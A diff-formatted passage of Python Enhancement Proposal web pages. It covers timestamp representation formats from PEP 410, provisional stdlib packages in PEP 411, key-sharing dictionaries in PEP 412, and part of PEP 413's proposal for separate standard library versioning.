  • A: (numerator, denominator)
      +
    • value = numerator / denominator
    • +
    • resolution = 1 / denominator
    • +
    • denominator > 0
    • +
    +
  • +
  • B: (seconds, numerator, denominator)
      +
    • value = seconds + numerator / denominator
    • +
    • resolution = 1 / denominator
    • +
    • 0 <= numerator < denominator
    • +
    • denominator > 0
    • +
    +
  • +
  • C: (intpart, floatpart, base, exponent)
      +
    • value = intpart + floatpart / base^exponent
    • +
    • resolution = 1 / base^exponent
    • +
    • 0 <= floatpart < base^exponent
    • +
    • base > 0
    • +
    • exponent >= 0
    • +
    +
  • +
  • D: (intpart, floatpart, exponent)
      +
    • value = intpart + floatpart / 10^exponent
    • +
    • resolution = 1 / 10^exponent
    • +
    • 0 <= floatpart < 10^exponent
    • +
    • exponent >= 0
    • +
    +
  • +
  • E: (sec, nsec)
      +
    • value = sec + nsec × 10^-9
    • +
    • resolution = 10^-9 (nanosecond)
    • +
    • 0 <= nsec < 10^9
    • +
    +
  • +
+

All formats support an arbitrary resolution, except of the format (E).

+

The format (D) may not be able to store the exact value (it may lose precision) +if the clock frequency is arbitrary and cannot be expressed as a power of 10. +The format (C) has a similar issue, but in such a case, it is possible to use +base=frequency and exponent=1.

+

The formats (C), (D) and (E) allow optimization for conversion to float if the +base is 2 and to decimal.Decimal if the base is 10.

+

The format (A) is a simple fraction. It supports arbitrary precision, is simple +(only two fields), only requires a simple division to get the floating point +value, and is already used by float.as_integer_ratio().
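For example, runnable on any modern Python:

print((1.5).as_integer_ratio())  # (3, 2)
print((0.1).as_integer_ratio())  # (3602879701896397, 36028797018963968)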

+

To simplify the implementation (especially the C implementation to avoid +integer overflow), a numerator bigger than the denominator can be accepted. +The tuple may be normalized later.

+

Tuples of integers have been rejected because they don’t support arithmetic +operations.

+
+

Note

+

On Windows, the QueryPerformanceCounter() clock uses the frequency of +the processor, which is an arbitrary number and so may not be a power of 2 or +10. The frequency can be read using QueryPerformanceFrequency().

+
+
+
+

timespec structure

+

timespec is the C structure used to store timestamp with a nanosecond +resolution. Python can use a type with the same structure: (seconds, +nanoseconds). For convenience, arithmetic operations on timespec are supported.

+

Example of an incomplete timespec type supporting addition, subtraction and +coercion to float:

+
class timespec(tuple):
+    def __new__(cls, sec, nsec):
+        if not isinstance(sec, int):
+            raise TypeError
+        if not isinstance(nsec, int):
+            raise TypeError
+        asec, nsec = divmod(nsec, 10 ** 9)
+        sec += asec
+        obj = tuple.__new__(cls, (sec, nsec))
+        obj.sec = sec
+        obj.nsec = nsec
+        return obj
+
+    def __float__(self):
+        return self.sec + self.nsec * 1e-9
+
+    def total_nanoseconds(self):
+        return self.sec * 10 ** 9 + self.nsec
+
+    def __add__(self, other):
+        if not isinstance(other, timespec):
+            raise TypeError
+        ns_sum = self.total_nanoseconds() + other.total_nanoseconds()
+        return timespec(*divmod(ns_sum, 10 ** 9))
+
+    def __sub__(self, other):
+        if not isinstance(other, timespec):
+            raise TypeError
+        ns_diff = self.total_nanoseconds() - other.total_nanoseconds()
+        return timespec(*divmod(ns_diff, 10 ** 9))
+
+    def __str__(self):
+        if self.sec < 0 and self.nsec:
+            sec = abs(1 + self.sec)
+            nsec = 10**9 - self.nsec
+            return '-%i.%09u' % (sec, nsec)
+        else:
+            return '%i.%09u' % (self.sec, self.nsec)
+
+    def __repr__(self):
+        return '<timespec(%s, %s)>' % (self.sec, self.nsec)
+
+
+

The timespec type is similar to the format (E) of tuples of integer, except +that it supports arithmetic and coercion to float.

+

The timespec type was rejected because it only supports nanosecond resolution +and requires implementing each arithmetic operation, whereas the Decimal type +is already implemented and well tested.

+
+
+
+

Alternatives: API design

+
+

Add a string argument to specify the return type

+

Add a string argument to functions returning timestamps, for example: +time.time(format="datetime"). A string is more extensible than a type: it is +possible to request a format that has no type, like a tuple of integers.

+

This API was rejected because it would require implicitly importing modules to +instantiate objects (e.g. importing datetime to create datetime.datetime). +Importing a module may raise an exception and may be slow; such behaviour is +unexpected and surprising.

+
+
+

Add a global flag to change the timestamp type

+

A global flag like os.stat_decimal_times(), similar to os.stat_float_times(), +can be added to set the timestamp type globally.

+

A global flag may cause issues with libraries and applications expecting float +instead of Decimal. Decimal is not fully compatible with float. float+Decimal +raises a TypeError for example. The os.stat_float_times() case is different +because an int can be coerced to float and int+float gives float.

+
+
+

Add a protocol to create a timestamp

+

Instead of hard coding how timestamps are created, a new protocol can be added +to create a timestamp from a fraction.

+

For example, time.time(timestamp=type) would call the class method +type.__fromfraction__(numerator, denominator) to create a timestamp object of +the specified type. If the type doesn’t support the protocol, a fallback is +used: type(numerator) / type(denominator).

+

A variant is to use a “converter” callback to create a timestamp. Example +creating a float timestamp:

+
def timestamp_to_float(numerator, denominator):
+    return float(numerator) / float(denominator)
+
+
+

Common converters can be provided by time, datetime and other modules, or maybe +a specific “hires” module. Users can define their own converters.

+

Such a protocol has a limitation: the timestamp structure has to be decided once +and cannot be changed later. For example, adding a timezone or the absolute +start of the timestamp would break the API.

+

The protocol proposition was rejected as being excessive given the requirements, +but the specific syntax proposed (time.time(timestamp=type)) allows this to be +introduced later if compelling use cases are discovered.

+
+

Note

+

Other formats may be used instead of a fraction: see the tuple of integers +section for example.

+
+
+
+

Add new fields to os.stat

+

To get the creation, modification and access time of a file with a nanosecond +resolution, three fields can be added to the os.stat() structure.

+

The new fields can be timestamps with nanosecond resolution (e.g. Decimal) or +the nanosecond part of each timestamp (int).

+

If the new fields are timestamps with nanosecond resolution, populating the +extra fields would be time-consuming. Any call to os.stat() would be slower, +even if os.stat() is only called to check if a file exists. A parameter can be +added to os.stat() to make these fields optional; the structure would then have +a variable number of fields.

+

If the new fields only contain the fractional part (nanoseconds), os.stat() +would be efficient. These fields would always be present and so set to zero if +the operating system does not support sub-second resolution. Splitting a +timestamp in two parts, seconds and nanoseconds, is similar to the timespec +type and tuple of integers, and so has the same drawbacks.

+

Adding new fields to the os.stat() structure does not solve the nanosecond +issue in other modules (e.g. the time module).

+
+
+

Add a boolean argument

+

Because we only need one new type (Decimal), a simple boolean flag can be +added. Example: time.time(decimal=True) or time.time(hires=True).

+

Such a flag would require a hidden import, which is considered bad +practice.

+

The boolean argument API was rejected because it is not “pythonic”. Changing +the return type with a parameter value is preferred over a boolean parameter (a +flag).

+
+
+

Add new functions

+

Add new functions for each type, examples:

+
    +
  • time.clock_decimal()
  • +
  • time.time_decimal()
  • +
  • os.stat_decimal()
  • +
  • os.stat_timespec()
  • +
  • etc.
  • +
+

Adding a new function for each function creating timestamps duplicates a lot of +code and would be a pain to maintain.

+
+
+

Add a new hires module

+

Add a new module called “hires” with the same API as the time module, except +that it would return timestamps with high resolution, e.g. decimal.Decimal. +Adding a new module avoids linking low-level modules like time or os to the +decimal module.

+

This idea was rejected because it would require duplicating most of the code of +the time module, would be a pain to maintain, and timestamps are used in modules +other than the time module. Examples: signal.sigtimedwait(), select.select(), +resource.getrusage(), os.stat(), etc. Duplicating the code of each module is not +acceptable.

+
+
+ + +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0410.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0411/index.html b/pep-0411/index.html new file mode 100644 index 00000000000..5520831083f --- /dev/null +++ b/pep-0411/index.html @@ -0,0 +1,331 @@ PEP 411 – Provisional packages in the Python standard library | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 411 – Provisional packages in the Python standard library

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>, +Eli Bendersky <eliben at gmail.com>
+
Status:
+
Superseded
+
Type:
+
Informational
+
Created:
+
10-Feb-2012
+
Python-Version:
+
3.3
+
Post-History:
+
10-Feb-2012, 24-Mar-2012
+
+
+
+
Table of Contents +
+
+

Note

+

This PEP has been marked as Superseded. A decade after this PEP +was written, experience has shown this is a rarely used feature in +managing the standard library. It has also not helped prevent +people from relying too heavily on provisional modules, such that +changes can still cause significant breakage in the community.

+
+
+

Abstract

+

The process of including a new package into the Python standard library is +hindered by the API lock-in and promise of backward compatibility implied by +a package being formally part of Python. This PEP describes a methodology +for marking a standard library package “provisional” for the period of a single +feature release. A provisional package may have its API modified prior to +“graduating” into a “stable” state. On one hand, this state provides the +package with the benefits of being formally part of the Python distribution. +On the other hand, the core development team explicitly states that no promises +are made with regards to the stability of the package’s API, which may +change for the next release. While it is considered an unlikely outcome, +such packages may even be removed from the standard library without a +deprecation period if the concerns regarding their API or maintenance prove +well-founded.

+
+
+

Proposal - a documented provisional state

+

Whenever the Python core development team decides that a new package should be +included into the standard library, but isn’t entirely sure about whether the +package’s API is optimal, the package can be included and marked as +“provisional”.

+

In the next feature release, the package may either be “graduated” into a normal +“stable” state in the standard library, remain in provisional state, or be +rejected and removed entirely from the Python source tree. If the package ends +up graduating into the stable state after being provisional, its API may +be changed according to accumulated feedback. The core development team +explicitly makes no guarantees about API stability and backward compatibility +of provisional packages.

+
+

Marking a package provisional

+

A package will be marked provisional by a notice in its documentation page and +its docstring. The following paragraph will be added as a note at the top of +the documentation page:

+
+
The <X> package has been included in the standard library on a +provisional basis. Backwards incompatible changes (up to and including +removal of the package) may occur if deemed necessary by the core +developers.
+

The phrase “provisional basis” will then be a link to the glossary term +“provisional package”, defined as:

+
+
A provisional package is one which has been deliberately excluded from the +standard library’s backwards compatibility guarantees. While major +changes to such packages are not expected, as long as they are marked +provisional, backwards incompatible changes (up to and including removal of +the package) may occur if deemed necessary by core developers. Such changes +will not be made gratuitously – they will occur only if serious flaws are +uncovered that were missed prior to the inclusion of the package.

This process allows the standard library to continue to evolve over time, +without locking in problematic design errors for extended periods of time. +See PEP 411 for more details.

+
+

The following will be added to the start of the package’s docstring:

+
+
The API of this package is currently provisional. Refer to the +documentation for details.
+

Moving a package from the provisional to the stable state simply implies +removing these notes from its documentation page and docstring.

+
+
+

Which packages should go through the provisional state

+

We expect most packages proposed for addition into the Python standard library +to go through a feature release in the provisional state. There may, however, +be some exceptions, such as packages that use a pre-defined API (for example +lzma, which generally follows the API of the existing bz2 package), +or packages with an API that has wide acceptance in the Python development +community.

+

In any case, packages that are proposed to be added to the standard library, +whether via the provisional state or directly, must fulfill the acceptance +conditions set by PEP 2.

+
+
+

Criteria for “graduation”

+

In principle, most provisional packages should eventually graduate to the +stable standard library. Some reasons for not graduating are:

+
    +
  • The package may prove to be unstable or fragile, without sufficient developer +support to maintain it.
  • +
  • A much better alternative package may be found during the preview release.
  • +
+

Essentially, the decision will be made by the core developers on a per-case +basis. The point to emphasize here is that a package’s inclusion in the +standard library as “provisional” in some release does not guarantee it will +continue being part of Python in the next release. At the same time, the bar +for making changes in a provisional package is quite high. We expect that +most of the API of most provisional packages will be unchanged at graduation. +Withdrawals are expected to be rare.

+
+
+
+

Rationale

+
+

Benefits for the core development team

+

Currently, the core developers are really reluctant to add new interfaces to +the standard library. This is because as soon as they’re published in a +release, API design mistakes get locked in due to backward compatibility +concerns.

+

By gating all major API additions through some kind of a provisional mechanism +for a full release, we get one full release cycle of community feedback +before we lock in the APIs with our standard backward compatibility guarantee.

+

We can also start integrating provisional packages with the rest of the standard +library early, so long as we make it clear to packagers that the provisional +packages should not be considered optional. The only difference between +provisional APIs and the rest of the standard library is that provisional APIs +are explicitly exempted from the usual backward compatibility guarantees.

+
+
+

Benefits for end users

+

For future end users, the broadest benefit lies in a better “out-of-the-box” +experience - rather than being told “oh, the standard library tools for task X +are horrible, download this 3rd party library instead”, those superior tools +are more likely to be just an import away.

+

For environments where developers are required to conduct due diligence on +their upstream dependencies (severely harming the cost-effectiveness of, or +even ruling out entirely, much of the material on PyPI), the key benefit lies +in ensuring that all packages in the provisional state are clearly under +python-dev’s aegis from at least the following perspectives:

+
    +
  • Licensing: Redistributed by the PSF under a Contributor Licensing Agreement.
  • +
  • Documentation: The documentation of the package is published and organized via +the standard Python documentation tools (i.e. ReST source, output generated +with Sphinx and published on http://docs.python.org).
  • +
  • Testing: The package test suites are run on the python.org buildbot fleet +and results published via http://www.python.org/dev/buildbot.
  • +
  • Issue management: Bugs and feature requests are handled on +http://bugs.python.org
  • +
  • Source control: The master repository for the software is published +on http://hg.python.org.
  • +
+
+
+
+

Candidates for provisional inclusion into the standard library

+

For Python 3.3, there are a number of clear current candidates:

+ +

Other possible future use cases include:

+
    +
  • Improved HTTP modules (e.g. requests)
  • +
  • HTML 5 parsing support (e.g. html5lib)
  • +
  • Improved URL/URI/IRI parsing
  • +
  • A standard image API (PEP 368)
  • +
  • Improved encapsulation of import state (PEP 406)
  • +
  • Standard event loop API (PEP 3153)
  • +
  • A binary version of WSGI for Python 3 (e.g. PEP 444)
  • +
  • Generic function support (e.g. simplegeneric)
  • +
+
+
+

Rejected alternatives and variations

+

See PEP 408.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0411.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0412/index.html b/pep-0412/index.html new file mode 100644 index 00000000000..d958c8d823b --- /dev/null +++ b/pep-0412/index.html @@ -0,0 +1,322 @@ PEP 412 – Key-Sharing Dictionary | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 412 – Key-Sharing Dictionary

+
+
Author:
+
Mark Shannon <mark at hotpy.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
08-Feb-2012
+
Python-Version:
+
3.3
+
Post-History:
+
08-Feb-2012
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a change in the implementation of the builtin +dictionary type dict. The new implementation allows dictionaries +which are used as attribute dictionaries (the __dict__ attribute +of an object) to share keys with other attribute dictionaries of +instances of the same class.

+
+
+

Motivation

+

The current dictionary implementation uses more memory than is +necessary when used as a container for object attributes as the keys +are replicated for each instance rather than being shared across many +instances of the same class. Despite this, the current dictionary +implementation is finely tuned and performs very well as a +general-purpose mapping object.

+

By separating the keys (and hashes) from the values it is possible to +share the keys between multiple dictionaries and improve memory use. +By ensuring that keys are separated from the values only when +beneficial, it is possible to retain the high-performance of the +current dictionary implementation when used as a general-purpose +mapping object.

+
+
+

Behaviour

+

The new dictionary behaves in the same way as the old implementation. +It fully conforms to the Python API, the C API and the ABI.

+
+
+

Performance

+
+

Memory Usage

+

Reduction in memory use is directly related to the number of +dictionaries with shared keys in existence at any time. These +dictionaries are typically half the size of the current dictionary +implementation.

+

Benchmarking shows that memory use is reduced by 10% to 20% for +object-oriented programs with no significant change in memory use for +other programs.
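This effect can be observed directly from Python code on a CPython build that includes the new dictionary (a minimal demonstration; the exact byte counts vary by CPython version and platform):

import sys

class Point:
    def __init__(self, x, y):
        self.x = x
        self.y = y

p = Point(1, 2)

# The attribute dict is in split form and shares its keys table with
# every other Point instance; copying it into an ordinary dict forces
# a combined table holding the same contents.
print(sys.getsizeof(p.__dict__))        # split (key-sharing) form
print(sys.getsizeof(dict(p.__dict__)))  # combined form, noticeably larger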

+
+
+

Speed

+

The performance of the new implementation is dominated by memory +locality effects. When keys are not shared (for example in module +dictionaries and dictionaries explicitly created by dict() or +{}) then performance is unchanged (within a percent or two) from +the current implementation.

+

For the shared keys case, the new implementation tends to separate +keys from values, but reduces total memory usage. This will improve +performance in many cases as the effects of reduced memory usage +outweigh the loss of locality, but some programs may show a small slow +down.

+

Benchmarking shows no significant change of speed for most benchmarks. +Object-oriented benchmarks show small speed ups when they create large +numbers of objects of the same class (the gcbench benchmark shows a +10% speed up; this is likely to be an upper limit).

+
+
+
+

Implementation

+

Both the old and new dictionaries consist of a fixed-sized dict struct +and a re-sizeable table. In the new dictionary the table can be +further split into a keys table and values array. The keys table +holds the keys and hashes and (for non-split tables) the values as +well. It differs only from the original implementation in that it +contains a number of fields that were previously in the dict struct. +If a table is split the values in the keys table are ignored, instead +the values are held in a separate array.
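As a rough illustration of that layout, consider the following toy Python model (purely illustrative, not CPython source; hashing and open addressing are omitted):

# One shared keys table per class; each instance holds a parallel
# values array. In split form, the value slots inside the keys table
# itself are simply ignored.
shared_keys = ['x', 'y', None, None]      # one entry per table slot

values_a = [1, 2, None, None]             # instance a
values_b = [3, 4, None, None]             # instance b

def lookup(values, key):
    # The real implementation probes by hash rather than scanning.
    return values[shared_keys.index(key)]

assert lookup(values_a, 'y') == 2
assert lookup(values_b, 'x') == 3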

+
+

Split-Table dictionaries

+

When dictionaries are created to fill the __dict__ slot of an object, +they are created in split form. The keys table is cached in the type, +potentially allowing all attribute dictionaries of instances of one +class to share keys. In the event of the keys of these dictionaries +starting to diverge, individual dictionaries will lazily convert to +the combined-table form. This ensures good memory use in the common +case, and correctness in all cases.

+

When resizing a split dictionary it is converted to a combined table. +If resizing is as a result of storing an instance attribute, and there +is only one instance of the class, then the dictionary will be re-split +immediately. Since most OO code will set attributes in the __init__ +method, all attributes will be set before a second instance is created +and no more resizing will be necessary as all further instance +dictionaries will have the correct size. For more complex use +patterns, it is impossible to know what the best approach is, so the +implementation allows extra insertions up to the point of a resize, +when it reverts to the combined table (non-shared keys).

+

A deletion from a split dictionary does not change the keys table, it +simply removes the value from the values array.

+
+
+

Combined-Table dictionaries

+

Explicit dictionaries (dict() or {}), module dictionaries and +most other dictionaries are created as combined-table dictionaries. A +combined-table dictionary never becomes a split-table dictionary. +Combined tables are laid out in much the same way as the tables in the +old dictionary, resulting in very similar performance.

+
+
+
+

Implementation

+

The new dictionary implementation is available at [1].

+
+
+

Pros and Cons

+
+

Pros

+

Significant memory savings for object-oriented applications. Small +improvement to speed for programs which create lots of similar +objects.

+
+
+

Cons

+

Change to data structures: Third party modules which meddle with the +internals of the dictionary implementation will break.

+

Changes to repr() output and iteration order: For most cases, this +will be unchanged. However, for some split-table dictionaries the +iteration order will change.

+

Neither of these cons should be a problem. Modules which meddle with +the internals of the dictionary implementation are already broken and +should be fixed to use the API. The iteration order of dictionaries +was never defined and has always been arbitrary; it is different for +Jython and PyPy.

+
+
+

Alternative Implementation

+

An alternative implementation for split tables, which could save even +more memory, is to store an index in the value field of the keys table +(instead of ignoring the value field). This index would explicitly +state where in the value array to look. The value array would then +only require 1 field for each usable slot in the key table, rather +than each slot in the key table.
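In terms of the toy model shown earlier, each used slot in the keys table would carry an explicit index, allowing the values array to be sized to the number of usable slots rather than the full table (again purely illustrative):

# Keys table slots are (key, index_into_values), or None if unused.
shared_keys = [('x', 0), None, ('y', 1), None]

values_a = [1, 2]    # one entry per usable slot, not per table slot

def lookup(values, key):
    for slot in shared_keys:
        if slot is not None and slot[0] == key:
            return values[slot[1]]
    raise KeyError(key)

assert lookup(values_a, 'y') == 2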

+

This “indexed” version would reduce the size of the value array by about +one third. The keys table would need an extra “values_size” field, +increasing the size of combined dicts by one word. The extra +indirection adds more complexity to the code, potentially reducing +performance a little.

+

The “indexed” version will not be included in this implementation, but +should be considered deferred rather than rejected, pending further +experimentation.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0412.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0413/index.html b/pep-0413/index.html new file mode 100644 index 00000000000..39204401758 --- /dev/null +++ b/pep-0413/index.html @@ -0,0 +1,1000 @@ + PEP 413 – Faster evolution of the Python Standard Library | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 413 – Faster evolution of the Python Standard Library

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Process
+
Created:
+
24-Feb-2012
+
Post-History:
+
24-Feb-2012, 25-Feb-2012
+
+
+
+
+
+

PEP Withdrawal

+

With the acceptance of PEP 453 meaning that pip will be available to +most new Python users by default, this will hopefully reduce the pressure +to add new modules to the standard library before they are sufficiently +mature.

+

The last couple of years have also seen increased usage of the model where +a standard library package also has an equivalent available from the Python +Package Index that also supports older versions of Python.

+

Given these two developments and the level of engagement throughout the +Python 3.4 release cycle, the PEP author no longer feels it would be +appropriate to make such a fundamental change to the standard library +development process.

+
+
+

Abstract

+

This PEP proposes the adoption of a separate versioning scheme for the +standard library (distinct from, but coupled to, the existing language +versioning scheme) that allows accelerated releases of the Python standard +library, while maintaining (or even slowing down) the current rate of +change in the core language definition.

+

Like PEP 407, it aims to adjust the current balance between measured +change that allows the broader community time to adapt and being able to +keep pace with external influences that evolve more rapidly than the current +release cycle can handle (this problem is particularly notable for +standard library elements that relate to web technologies).

+

However, it’s more conservative in its aims than PEP 407, seeking to +restrict the increased pace of development to builtin and standard library +interfaces, without affecting the rate of change for other elements such +as the language syntax and version numbering as well as the CPython +binary API and bytecode format.

+
+
+

Rationale

+

To quote the PEP 407 abstract:

+
+
Finding a release cycle for an open-source project is a delicate exercise +in managing mutually contradicting constraints: developer manpower, +availability of release management volunteers, ease of maintenance for +users and third-party packagers, quick availability of new features (and +behavioural changes), availability of bug fixes without pulling in new +features or behavioural changes.

The current release cycle errs on the conservative side. It is adequate +for people who value stability over reactivity. This PEP is an attempt to +keep the stability that has become a Python trademark, while offering a +more fluid release of features, by introducing the notion of long-term +support versions.

+
+

I agree with the PEP 407 authors that the current release cycle of the +standard library is too slow to effectively cope with the pace of change +in some key programming areas (specifically, web protocols and related +technologies, including databases, templating and serialisation formats).

+

However, I have written this competing PEP because I believe that the +approach proposed in PEP 407 of offering full, potentially binary +incompatible releases of CPython every 6 months places too great a burden +on the wider Python ecosystem.

+

Under the current CPython release cycle, distributors of key binary +extensions will often support Python releases even after the CPython branches +enter “security fix only” mode (for example, Twisted currently ships binaries +for 2.5, 2.6 and 2.7, NumPy and SciPy support those 3 along with 3.1 and 3.2, +PyGame adds a 2.4 binary release, wxPython provides both 32-bit and 64-bit +binaries for 2.6 and 2.7, etc).

+

If CPython were to triple (or more) its rate of releases, the developers of +those libraries (many of which are even more resource starved than CPython) +would face an unpalatable choice: either adopt the faster release cycle +themselves (up to 18 simultaneous binary releases for PyGame!), drop +older Python versions more quickly, or else tell their users to stick to the +CPython LTS releases (thus defeating the entire point of speeding up the +CPython release cycle in the first place).

+

Similarly, many support tools for Python (e.g. syntax highlighters) can take +quite some time to catch up with language level changes.

+

At a cultural level, the Python community is also accustomed to a certain +meaning for Python version numbers - they’re linked to deprecation periods, +support periods, all sorts of things. PEP 407 proposes that collective +knowledge all be swept aside, without offering a compelling rationale for why +such a course of action is actually necessary (aside from, perhaps, making +the lives of the CPython core developers a little easier at the expense of +everyone else).

+

However, if we go back to the primary rationale for increasing the pace of +change (i.e. more timely support for web protocols and related technologies), +we can note that those only require standard library changes. That means +many (perhaps even most) of the negative effects on the wider community can +be avoided by explicitly limiting which parts of CPython are affected by the +new release cycle, and allowing other parts to evolve at their current, more +sedate, pace.

+
+
+

Proposal

+

This PEP proposes the introduction of a new kind of CPython release: +“standard library releases”. As with PEP 407, this will give CPython 3 kinds +of release:

+
    +
  • Language release: “x.y.0”
  • +
  • Maintenance release: “x.y.z” (where z > 0)
  • +
  • Standard library release: “x.y (xy.z)” (where z > 0)
  • +
+

Under this scheme, an unqualified version reference (such as “3.3”) would +always refer to the most recent corresponding language or maintenance +release. It will never be used without qualification to refer to a standard +library release (at least, not by python-dev - obviously, we can only set an +example, not force the rest of the Python ecosystem to go along with it).

+

Language releases will continue as they are now, as new versions of the +Python language definition, along with a new version of the CPython +interpreter and the Python standard library. Accordingly, a language +release may contain any and all of the following changes:

+
    +
  • new language syntax
  • +
  • new standard library changes (see below)
  • +
  • new deprecation warnings
  • +
  • removal of previously deprecated features
  • +
  • changes to the emitted bytecode
  • +
  • changes to the AST
  • +
  • any other significant changes to the compilation toolchain
  • +
  • changes to the core interpreter eval loop
  • +
  • binary incompatible changes to the C ABI (although the PEP 384 stable ABI +must still be preserved)
  • +
  • bug fixes
  • +
+

Maintenance releases will also continue as they do today, being strictly +limited to bug fixes for the corresponding language release. No new features +or radical internal changes are permitted.

+

The new standard library releases will occur in parallel with each +maintenance release and will be qualified with a new version identifier +documenting the standard library version. Standard library releases may +include the following changes:

+
    +
  • new features in pure Python modules
  • +
  • new features in C extension modules (subject to PEP 399 compatibility +requirements)
  • +
  • new features in language builtins (provided the C ABI remains unaffected)
  • +
  • bug fixes from the corresponding maintenance release
  • +
+

Standard library version identifiers are constructed by combining the major +and minor version numbers for the Python language release into a single two +digit number and then appending a sequential standard library version +identifier.
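For example, a hypothetical helper applying that rule (the function name is illustrative only, not part of the proposal):

def stdlib_version(major, minor, serial):
    # Language release 3.3 plus its first standard library
    # release -> "3.3 (33.1)"
    return "%d.%d (%d%d.%d)" % (major, minor, major, minor, serial)

assert stdlib_version(3, 3, 1) == "3.3 (33.1)"
assert stdlib_version(3, 4, 2) == "3.4 (34.2)"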

+
+

Release Cycle

+

When maintenance releases are created, two new versions of Python would +actually be published on python.org (using the first 3.3 maintenance release, +planned for February 2013 as an example):

+
3.3.1       # Maintenance release
+3.3 (33.1)  # Standard library release
+
+
+

A further 6 months later, the next 3.3 maintenance release would again be +accompanied by a new standard library release:

+
3.3.2       # Maintenance release
+3.3 (33.2)  # Standard library release
+
+
+

Again, the standard library release would be binary compatible with the +previous language release, merely offering additional features at the +Python level.

+

Finally, 18 months after the release of 3.3, a new language release would +be made around the same time as the final 3.3 maintenance and standard +library releases:

+
3.3.3       # Maintenance release
+3.3 (33.3)  # Standard library release
+3.4.0       # Language release
+
+
+

The 3.4 release cycle would then follow a similar pattern to that for 3.3:

+
3.4.1       # Maintenance release
+3.4 (34.1)  # Standard library release
+
+3.4.2       # Maintenance release
+3.4 (34.2)  # Standard library release
+
+3.4.3       # Maintenance release
+3.4 (34.3)  # Standard library release
+3.5.0       # Language release
+
+
+
+
+

Programmatic Version Identification

+

To expose the new version details programmatically, this PEP proposes the +addition of a new sys.stdlib_info attribute that records the new +standard library version above and beyond the underlying interpreter +version. Using the initial Python 3.3 release as an example:

+
sys.stdlib_info(python=33, version=0, releaselevel='final', serial=0)
+
+
+

This information would also be included in the sys.version string:

+
Python 3.3.0 (33.0, default, Feb 17 2012, 23:03:41)
+[GCC 4.6.1]
+
+
+
+
+

Security Fixes and Other “Out of Cycle” Releases

+

For maintenance releases the process of handling out-of-cycle releases (for +example, to fix a security issue or resolve a critical bug in a new release), +remains the same as it is now: the minor version number is incremented and a +new release is made incorporating the required bug fixes, as well as any +other bug fixes that have been committed since the previous release.

+

For standard library releases, the process is essentially the same, but the +corresponding “What’s New?” document may require some tidying up for the +release (as the standard library release may incorporate new features, +not just bug fixes).

+
+
+
+

User Scenarios

+

The versioning scheme proposed above is based on a number of user scenarios +that are likely to be encountered if this scheme is adopted. In each case, +the scenario is described for the status quo (i.e. the slow release cycle), +the versioning scheme in this PEP and the free-wheeling minor version number +scheme proposed in PEP 407.

+

To give away the ending, the point of using a separate version number is that +for almost all scenarios, the important number is the language version, not +the standard library version. Most users won’t even need to care that the +standard library version number exists. In the two identified cases where +it matters, providing it as a separate number is actually clearer and more +explicit than embedding the two different kinds of number into a single +sequence and then tagging some of the numbers in the unified sequence as +special.

+
+

Novice user, downloading Python from python.org in March 2013

+

Status quo: must choose between 3.3 and 2.7

+

This PEP: must choose between 3.3 (33.1), 3.3 and 2.7.

+

PEP 407: must choose between 3.4, 3.3 (LTS) and 2.7.

+

Verdict: explaining the meaning of a Long Term Support release is about as +complicated as explaining the meaning of the proposed standard library release +version numbers. I call this a tie.

+
+
+

Novice user, attempting to judge currency of third party documentation

+

Status quo: minor version differences indicate 18-24 months of +language evolution

+

This PEP: same as status quo for language core, standard library version +numbers indicate 6 months of standard library evolution.

+

PEP 407: minor version differences indicate 18-24 months of language +evolution up to 3.3, then 6 months of language evolution thereafter.

+

Verdict: Since language changes and deprecations can have a much bigger +effect on the accuracy of third party documentation than the addition of new +features to the standard library, I’m calling this a win for the scheme +in this PEP.

+
+
+

Novice user, looking for an extension module binary release

+

Status quo: look for the binary corresponding to the Python version you are +running.

+

This PEP: same as status quo.

+

PEP 407 (full releases): same as status quo, but corresponding binary version +is more likely to be missing (or, if it does exist, has to be found amongst +a much larger list of alternatives).

+

PEP 407 (ABI updates limited to LTS releases): all binary release pages will +need to tell users that Python 3.3, 3.4 and 3.5 all need the 3.3 binary.

+

Verdict: I call this a clear win for the scheme in this PEP. Absolutely +nothing changes from the current situation, since the standard library +version is actually irrelevant in this case (only binary extension +compatibility is important).

+
+
+

Extension module author, deciding whether or not to make a binary release

+

Status quo: unless using the PEP 384 stable ABI, a new binary release is +needed every time the minor version number changes.

+

This PEP: same as status quo.

+

PEP 407 (full releases): same as status quo, but becomes a far more +frequent occurrence.

+

PEP 407 (ABI updates limited to LTS releases): before deciding, must first +look up whether the new release is an LTS release or an interim release. If +it is an LTS release, then a new build is necessary.

+

Verdict: I call this another clear win for the scheme in this PEP. As with +the end user facing side of this problem, the standard library version is +actually irrelevant in this case. Moving that information out to a +separate number avoids creating unnecessary confusion.

+
+
+

Python developer, deciding priority of eliminating a Deprecation Warning

+

Status quo: code that triggers deprecation warnings is not guaranteed to +run on a version of Python with a higher minor version number.

+

This PEP: same as status quo

+

PEP 407: unclear, as the PEP doesn’t currently spell this out. Assuming the +deprecation cycle is linked to LTS releases, then upgrading to a non-LTS +release is safe but upgrading to the next LTS release may require avoiding +the deprecated construct.

+

Verdict: another clear win for the scheme in this PEP since, once again, the +standard library version is irrelevant in this scenario.

+
+
+

Alternative interpreter implementor, updating with new features

+

Status quo: new Python versions arrive infrequently, but are a mish-mash of +standard library updates and core language definition and interpreter +changes.

+

This PEP: standard library updates, which are easier to integrate, are +made available more frequently in a form that is clearly and explicitly +compatible with the previous version of the language definition. This means +that, once an alternative implementation catches up to Python 3.3, they +should have a much easier time incorporating standard library features as +they happen (especially pure Python changes), leaving minor version number +updates as the only task that requires updates to their core compilation and +execution components.

+

